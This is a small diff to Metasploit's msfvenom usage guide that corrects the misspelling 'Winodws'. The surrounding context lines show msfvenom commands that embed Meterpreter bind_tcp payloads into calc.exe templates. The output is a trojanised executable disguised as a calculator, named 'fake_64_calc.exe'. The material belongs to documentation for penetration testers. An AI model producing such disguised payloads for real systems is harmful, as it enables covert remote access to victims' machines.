rapid7/metasploit-framework/How-to-use-msfvenom.md

 ./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe
 ```

-Please note: If you'd like to create a x64 payload with a custom x64 custom template for Winodws, then instead of the exe format, you should use exe-only:
+Please note: If you'd like to create a x64 payload with a custom x64 custom template for Windows, then instead of the exe format, you should use exe-only:

 ```
 ./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe